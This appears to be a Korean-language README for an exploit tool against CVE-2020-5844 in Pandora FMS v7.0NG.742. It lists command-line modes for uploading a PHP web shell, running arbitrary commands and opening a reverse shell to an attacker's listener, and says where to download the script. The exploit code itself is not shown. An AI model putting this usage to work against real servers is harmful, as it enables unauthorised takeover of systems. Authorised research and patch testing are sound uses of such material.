
CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution 익스플로잇

이 저장소가 마음에 드시나요? ⭐를 눌러주세요!
교육 및 승인된 보안 연구 목적으로만 사용하십시오.
@UNICORDev 작성자: (@NicPWNs 및 @Dev-Yeoj)
Pandora FMS v7.0 NG의 index.php?sec=godmode/extensions&sec2=extensions/files_repo는 인증된 관리자가 악성 PHP 스크립트를 업로드하고, 파일 위치의 base64 디코딩을 통해 실행할 수 있도록 합니다. 이는 v7.0NG.742_FIX_PERL2020에 영향을 미칩니다.
이 익스플로잇을 사용하여 취약한 버전의 Pandora FMS에서 원격 코드 실행을 수행합니다. 대상 IP 주소와 포트가 필요합니다. 유효한 사용자 이름/비밀번호 또는 유효한 PHPSESSID 쿠키 인증이 필요합니다. 기본 모드로 실행하면 기본 PHP 웹 셸을 업로드합니다. 사용자 지정 명령 모드로 실행하면 대상에서 사용자 지정 명령을 실행합니다. 리버스 셸 모드로 실행하면 설정한 리스너에서 대상의 리버스 셸을 받습니다. 웹 셸 사용자 지정 모드로 실행하면 PHP 웹 셸 파일의 이름을 변경합니다.
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
GitHub에서 exploit-CVE-2020-5844.py 다운로드
ExploitDB에서 exploit-CVE-2020-5844.py 다운로드
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




